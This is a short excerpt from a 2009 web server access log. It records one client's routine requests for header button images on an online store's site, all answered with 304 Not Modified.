79.8.147.186 - - [17/Jul/2009:04:39:38 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L113DE14E43940600CFA108S+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
79.8.147.186 - - [17/Jul/2009:04:39:38 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L113DE14E43940600CFA108S+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
79.8.147.186 - - [17/Jul/2009:04:39:38 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L113DE14E43940600CFA108S+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
79.8.147.186 - - [17/Jul/2009:04:39:38 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L113DE14E43940600CFA108S+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
